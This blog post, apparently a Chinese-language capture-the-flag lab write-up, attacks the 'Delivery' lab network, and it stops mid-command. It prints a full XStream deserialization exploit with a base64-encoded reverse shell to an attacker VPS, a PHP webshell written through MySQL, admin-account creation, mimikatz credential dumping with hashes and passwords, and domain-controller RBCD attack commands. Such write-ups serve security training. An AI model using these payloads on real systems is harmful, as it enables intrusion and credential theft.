{"id":2706,"date":"2023-10-04T20:32:46","date_gmt":"2023-10-04T12:32:46","guid":{"rendered":"https:\/\/fushuling.com\/?p=2706"},"modified":"2023-10-14T23:59:58","modified_gmt":"2023-10-14T15:59:58","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7delivery","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/10\/04\/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7delivery\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883\u00b7Delivery"},"content":{"rendered":"\n<p>\u8003\u70b9\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>xstream RCE<\/li>\n\n\n\n<li>mysql\u5f31\u53e3\u4ee4+\u5199\u9a6c<\/li>\n\n\n\n<li>ACL Admins\u5199RBCD<\/li>\n\n\n\n<li>linux\u5199\u516c\u94a5\u8fde\u63a5<\/li>\n\n\n\n<li>NFS\u5229\u7528<\/li>\n\n\n\n<li>ftp\u63d0\u6743<\/li>\n<\/ul>\n\n\n\n<p>\u4e3b\u9875\u6ca1\u4e1c\u897f\uff0c\u626b\u4e00\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>.\/fscan -h 39.99.135.35<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>start infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 39.99.135.35    is alive\n&#91;*] Icmp alive hosts len is: 1\n39.99.135.35:80 open\n39.99.135.35:8080 open\n39.99.135.35:21 open\n39.99.135.35:22 open\n&#91;*] alive ports len is: 4\nstart vulscan\n&#91;*] WebTitle: http:\/\/39.99.135.35       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works\n&#91;+] ftp:\/\/39.99.135.35:21:anonymous \n   &#91;->]1.txt\n   &#91;->]pom.xml\n&#91;*] WebTitle: http:\/\/39.99.135.35:8080  code:200 len:3655   title:\u516c\u53f8\u53d1\u8d27\u5355<\/code><\/pre>\n\n\n\n<p>\u770b\u5230\u6709\u4e2aftp\u670d\u52a1\uff0c\u80fd\u533f\u540d\u767b\u4e0a\u53bb\uff0c\u8fde\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/1-8-1024x646.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"646\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/1-8-1024x646.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2723\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>1.txt\u91cc\u6ca1\u4e1c\u897f\uff0cpom.xml:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?>\n&lt;project xmlns=\"http:\/\/maven.apache.org\/POM\/4.0.0\" xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n         xsi:schemaLocation=\"http:\/\/maven.apache.org\/POM\/4.0.0 https:\/\/maven.apache.org\/xsd\/maven-4.0.0.xsd\">\n    &lt;modelVersion>4.0.0&lt;\/modelVersion>\n    &lt;parent>\n        &lt;groupId>org.springframework.boot&lt;\/groupId>\n        &lt;artifactId>spring-boot-starter-parent&lt;\/artifactId>\n        &lt;version>2.7.2&lt;\/version>\n        &lt;relativePath\/> &lt;!-- lookup parent from repository -->\n    &lt;\/parent>\n    &lt;groupId>com.example&lt;\/groupId>\n    &lt;artifactId>ezjava&lt;\/artifactId>\n    &lt;version>0.0.1-SNAPSHOT&lt;\/version>\n    &lt;name>ezjava&lt;\/name>\n    &lt;description>ezjava&lt;\/description>\n    &lt;properties>\n        &lt;java.version>1.8&lt;\/java.version>\n    &lt;\/properties>\n    &lt;dependencies>\n        &lt;dependency>\n            &lt;groupId>org.springframework.boot&lt;\/groupId>\n            &lt;artifactId>spring-boot-starter-thymeleaf&lt;\/artifactId>\n        &lt;\/dependency>\n        &lt;dependency>\n            &lt;groupId>org.springframework.boot&lt;\/groupId>\n            &lt;artifactId>spring-boot-starter-web&lt;\/artifactId>\n        &lt;\/dependency>\n\n        &lt;dependency>\n            &lt;groupId>org.springframework.boot&lt;\/groupId>\n            &lt;artifactId>spring-boot-starter-test&lt;\/artifactId>\n            &lt;scope>test&lt;\/scope>\n        &lt;\/dependency>\n\n        &lt;dependency>\n            &lt;groupId>com.thoughtworks.xstream&lt;\/groupId>\n            &lt;artifactId>xstream&lt;\/artifactId>\n            &lt;version>1.4.16&lt;\/version>\n        &lt;\/dependency>\n\n        &lt;dependency>\n            &lt;groupId>commons-collections&lt;\/groupId>\n            &lt;artifactId>commons-collections&lt;\/artifactId>\n            &lt;version>3.2.1&lt;\/version>\n        &lt;\/dependency>\n    &lt;\/dependencies>\n\n    &lt;build>\n        &lt;plugins>\n            &lt;plugin>\n                &lt;groupId>org.springframework.boot&lt;\/groupId>\n                &lt;artifactId>spring-boot-maven-plugin&lt;\/artifactId>\n            &lt;\/plugin>\n        &lt;\/plugins>\n    &lt;\/build>\n\n&lt;\/project>\n<\/code><\/pre>\n\n\n\n<p>\u770b\u5230\u914d\u7f6e\u76f4\u63a5\u627e\u5230xstream\u7684\u6d1e\u4e86\uff0c\u7167\u7740\u6253\u5373\u53ef<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/vulhub\/vulhub\/blob\/master\/xstream\/CVE-2021-29505\/README.zh-cn.md\">https:\/\/github.com\/vulhub\/vulhub\/blob\/master\/xstream\/CVE-2021-29505\/README.zh-cn.md<\/a><\/p>\n\n\n\n<p>\u5728\u4f60\u7684vps\u4e0a\u5f00\u653e1099\u7aef\u53e3\uff0c\u7136\u540e\u7528yso\u8d77\u4e00\u4e0b\u670d\u52a1\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 \"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzUueHgueHgueHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}\"<\/code><\/pre>\n\n\n\n<p>\u63a5\u7740\u76d1\u542c\u4e00\u4e0b\u5f39shell\u7684\u7aef\u53e3\uff0c\u7136\u540e\u5411\u7f51\u7ad9\u4f20poc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/just_sumbit_it HTTP\/1.1\nHost: 39.99.135.35:8080\nContent-Length: 3119\nAccept: application\/xml, text\/xml, *\/*; q=0.01\nDNT: 1\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.0.0 Safari\/537.36\nContent-Type: application\/xml;charset=UTF-8\nOrigin: http:\/\/39.99.135.35:8080\nReferer: http:\/\/39.99.135.35:8080\/\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7\nContent-Type: application\/xml\nConnection: close\n\n\n&lt;java.util.PriorityQueue serialization='custom'>\n    &lt;unserializable-parents\/>\n    &lt;java.util.PriorityQueue>\n        &lt;default>\n            &lt;size>2&lt;\/size>\n        &lt;\/default>\n        &lt;int>3&lt;\/int>\n        &lt;javax.naming.ldap.Rdn_-RdnEntry>\n            &lt;type>12345&lt;\/type>\n            &lt;value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                &lt;m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content&lt;\/m__obj>\n            &lt;\/value>\n        &lt;\/javax.naming.ldap.Rdn_-RdnEntry>\n        &lt;javax.naming.ldap.Rdn_-RdnEntry>\n            &lt;type>12345&lt;\/type>\n            &lt;value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                &lt;message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    &lt;parsedMessage>true&lt;\/parsedMessage>\n                    &lt;soapVersion>SOAP_11&lt;\/soapVersion>\n                    &lt;bodyParts\/>\n                    &lt;sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        &lt;attachmentsInitialized>false&lt;\/attachmentsInitialized>\n                        &lt;nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            &lt;aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                &lt;candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    &lt;names>\n                                        &lt;string>aa&lt;\/string>\n                                        &lt;string>aa&lt;\/string>\n                                    &lt;\/names>\n                                    &lt;ctx>\n                                        &lt;environment\/>\n                                        &lt;registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            &lt;java.rmi.server.RemoteObject>\n                                                &lt;string>UnicastRef&lt;\/string>\n                                                &lt;string>VPS_IP&lt;\/string>\n                                                &lt;int>1099&lt;\/int>\n                                                &lt;long>0&lt;\/long>\n                                                &lt;int>0&lt;\/int>\n                                                &lt;long>0&lt;\/long>\n                                                &lt;short>0&lt;\/short>\n                                                &lt;boolean>false&lt;\/boolean>\n                                            &lt;\/java.rmi.server.RemoteObject>\n                                        &lt;\/registry>\n                                        &lt;host>VPS_IP&lt;\/host>\n                                        &lt;port>1099&lt;\/port>\n                                    &lt;\/ctx>\n                                &lt;\/candidates>\n                            &lt;\/aliases>\n                        &lt;\/nullIter>\n                    &lt;\/sm>\n                &lt;\/message>\n            &lt;\/value>\n        &lt;\/javax.naming.ldap.Rdn_-RdnEntry>\n    &lt;\/java.util.PriorityQueue>\n&lt;\/java.util.PriorityQueue><\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/2-3-1024x410.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"410\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/2-3-1024x410.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2725\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/3-1-1024x566.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"566\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/3-1-1024x566.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2724\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540ewget\u4e00\u4e0bfscan\u548cStowaway\uff0c\u6253\u5185\u7f51\u8001\u4e24\u6837\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>start infoscan\n(icmp) Target 172.22.13.14    is alive\n(icmp) Target 172.22.13.6     is alive\n(icmp) Target 172.22.13.28    is alive\n(icmp) Target 172.22.13.57    is alive\n&#91;*] Icmp alive hosts len is: 4\n172.22.13.28:80 open\n172.22.13.57:80 open\n172.22.13.57:22 open\n172.22.13.14:80 open\n172.22.13.14:22 open\n172.22.13.14:21 open\n172.22.13.6:445 open\n172.22.13.6:139 open\n172.22.13.28:445 open\n172.22.13.28:139 open\n172.22.13.6:135 open\n172.22.13.28:135 open\n172.22.13.14:8080 open\n172.22.13.28:8000 open\n172.22.13.28:3306 open\n172.22.13.6:88 open\n&#91;*] alive ports len is: 16\nstart vulscan\n&#91;*] NetInfo:\n&#91;*]172.22.13.28\n   &#91;->]WIN-HAUWOLAO\n   &#91;->]172.22.13.28\n&#91;*] NetInfo:\n&#91;*]172.22.13.6\n   &#91;->]WIN-DC\n   &#91;->]172.22.13.6\n&#91;*] WebTitle: http:\/\/172.22.13.14       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works\n&#91;*] NetBios: 172.22.13.6     &#91;+]DC XIAORANG\\WIN-DC          \n&#91;*] WebTitle: http:\/\/172.22.13.28       code:200 len:2525   title:\u6b22\u8fce\u767b\u5f55OA\u529e\u516c\u5e73\u53f0\n&#91;*] NetBios: 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393 \n&#91;*] WebTitle: http:\/\/172.22.13.57       code:200 len:4833   title:Welcome to CentOS\n&#91;*] WebTitle: http:\/\/172.22.13.28:8000  code:200 len:170    title:Nothing Here.\n&#91;+] ftp:\/\/172.22.13.14:21:anonymous \n   &#91;->]1.txt\n   &#91;->]pom.xml\n&#91;*] WebTitle: http:\/\/172.22.13.14:8080  code:200 len:3655   title:\u516c\u53f8\u53d1\u8d27\u5355\n&#91;+] mysql:172.22.13.28:3306:root 123456<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc172.22.13.28\u662f\u4e2amysql\u5f31\u53e3\u4ee4\uff0c\u8d77\u4e00\u4e0b\u5168\u5c40\u4ee3\u7406\u7528navicat\u8fde\u4e0a\u53bb<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/4-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/4-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2726\" style=\"width:533px;height:627px\" width=\"533\" height=\"627\"  sizes=\"auto, (max-width: 533px) 100vw, 533px\" \/><\/div><\/figure>\n\n\n\n<p>\u770b\u4e86\u4e00\u4e0bsecure_file_priv\uff0c\u53d1\u73b0\u662f\u7a7a\u7684\uff0c\u6240\u4ee5\u80fd\u5199\u6587\u4ef6\u4e0a\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>show variables like \"secure_file_priv\";<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/5-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"710\" height=\"374\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/5-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2727\"  sizes=\"auto, (max-width: 710px) 100vw, 710px\" \/><\/div><\/figure>\n\n\n\n<p>\u67e5\u770b\u65e5\u5fd7\u53d1\u73b0\u662fphpstudy\u8d77\u7684\u670d\u52a1\uff0c\u90a3\u5c31\u5f88\u597d\uff0c\u56e0\u4e3a\u8fd9\u4e1c\u897f\u6743\u9650\u5f88\u9ad8\uff0c\u4e00\u822c\u8fde\u4e0a\u53bb\u5c31\u662fsystem\u6743\u9650\uff0c\u4e0d\u7528udf\u63d0\u6743\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>show variables like \"%general%\"<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/6-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"863\" height=\"404\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/6-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2728\"  sizes=\"auto, (max-width: 863px) 100vw, 863px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>select \"&lt;?php eval($_POST&#91;1]);?>\" into outfile \"C:\/phpstudy_pro\/WWW\/1.php\";<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/7-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"888\" height=\"347\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/7-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2729\"  sizes=\"auto, (max-width: 888px) 100vw, 888px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fde\u4e00\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/8-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"976\" height=\"677\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/8-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2730\"  sizes=\"auto, (max-width: 976px) 100vw, 976px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u8001\u5730\u65b9\u62ff\u5230flag<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/9-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"950\" height=\"376\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/9-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2731\"  sizes=\"auto, (max-width: 950px) 100vw, 950px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u5efa\u4e2a\u7528\u6237rdp\u4e0a\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>net user fushuling qwer1234! \/add\nnet localgroup administrators fushuling \/add<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/10-1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"662\" height=\"178\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/10-1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2732\"  sizes=\"auto, (max-width: 662px) 100vw, 662px\" \/><\/div><\/figure>\n\n\n\n<p>\u7528BloodHound\u53d1\u73b0zhangwen\u8fd9\u4e2a\u7528\u6237\u662fACL Admins\u7ec4\u7684\uff0c\u5bf9WIN-DC\u5177\u6709WriteDacl\u6743\u9650\uff0c\u80fd\u5199\u5c5e\u6027\uff0c\u6bd4\u5982\u5199\u4e2aDCSync\u3001RBCD\u5565\u7684\u3002\u4e0d\u8fc7\u9996\u5148\u5148\u6293\u4e00\u4e0b\u5bc6\u7801\uff0c\u628a\u8fd9\u4e2a\u7528\u6237\u5bc6\u7801\u6293\u51fa\u6765 <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mimikatz.exe \"privilege::debug\" \"log\" \"sekurlsa::logonpasswords\" \"exit\" > test.txt<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>Authentication Id : 0 ; 219475 (00000000:00035953)\nSession           : Service from 0\nUser Name         : chenglei\nDomain            : XIAORANG\nLogon Server      : WIN-DC\nLogon Time        : 2023\/10\/4 16:46:14\nSID               : S-1-5-21-3269458654-3569381900-10559451-1105\n\tmsv :\t\n\t &#91;00000003] Primary\n\t * Username : chenglei\n\t * Domain   : XIAORANG\n\t * NTLM     : 0c00801c30594a1b8eaa889d237c5382\n\t * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7\n\t * DPAPI    : 89b179dc738db098372c365602b7b0f4\n\ttspkg :\t\n\twdigest :\t\n\t * Username : chenglei\n\t * Domain   : XIAORANG\n\t * Password : (null)\n\tkerberos :\t\n\t * Username : chenglei\n\t * Domain   : XIAORANG.LAB\n\t * Password : Xt61f3LBhg1\n\tssp :\t\n\tcredman :\t<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u7528RBCD\u6253\u4e00\u4e0b\u5c31\u884c\u4e86\uff0c\u6211\u8fd9\u91cc\u5f53\u65f6\u6ca1\u622a\u56fe\uff0c\u53ea\u80fd\u7528history\u770b\u4e00\u4e0b\u5f53\u65f6\u7684\u547d\u4ee4\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/1-9.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"718\" height=\"162\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/1-9.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2733\"  sizes=\"auto, (max-width: 718px) 100vw, 718px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains python3 addcomputer.py xiaorang.lab\/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -dc-host xiaorang.lab -computer-name 'TEST$' -computer-pass 'P@ssw0rd'\nproxychains python3 rbcd.py xiaorang.lab\/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -action write -delegate-to 'WIN-DC$' -delegate-from 'TEST$'\nproxychains python3 getST.py xiaorang.lab\/'TEST$':'P@ssw0rd' -spn cifs\/WIN-DC.xiaorang.lab -impersonate Administrator -dc-ip 172.22.13.6\nexport 